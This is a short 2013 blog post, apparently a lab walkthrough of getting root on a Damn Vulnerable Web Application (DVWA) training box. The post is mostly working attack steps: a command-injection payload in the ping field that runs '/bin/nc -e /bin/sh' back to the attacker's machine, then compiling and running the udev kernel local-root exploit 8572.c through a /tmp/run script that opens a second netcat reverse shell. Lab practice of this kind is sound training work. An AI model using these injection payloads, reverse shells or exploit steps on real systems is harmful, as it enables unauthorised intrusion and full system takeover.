Posted by Security is just an illusion at Wednesday, March 13, 2013
Read our previous post
Damn Vulnerable Web Application (DVWA)
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
Goal = Get Root !!!
Start Armitage
Netdiscover -r 192.168.228.0/24
ifconfig eth0 192.168.228.129
firefox 192.168.228.30
DWVA Login = admin password
Security Level = Low
Vulnerability Command Execution
Ping 0.0.0.0
0.0.0.0 && lc
0.0.0.0 && locate nc
0.0.0.0 && /bin/nc -e /bin/sh 192.168.228.129 4444
Start Netcat listen on Port 4444
Get Netccat Shell
id
uname -a
/pentest/exploits/exploitdb/
./searchexploits kernel 2.6
Use Linux Local Kernel 2,6 Udev < 141 Exploit
Upload Local Exploit
gcc 8572.c -o w00t
killall java //Armitage suckz on Upload some Time ..... Or my Low Maschine ;)
cat 8572.c //Understand How the Exploit is Working
ps auxf | grep udev >> udev // Get Udev Pid
cat udev
Start 2 Netcat Reverse Shell for Local Root Exploit //Port 666
echo '#!/bin/sh' > /tmp/run
echo '/bin/nc -e /bin/sh 192.168.228.129 666' >> /tmp/run
cat /tmp/run
./w00t 2676 //Start Exploit with Udev Pid -1
Get 2 shell with Root Privileges
Have pfun ;)
With great power comes Great Responsibility !!!
No comments:
Post a Comment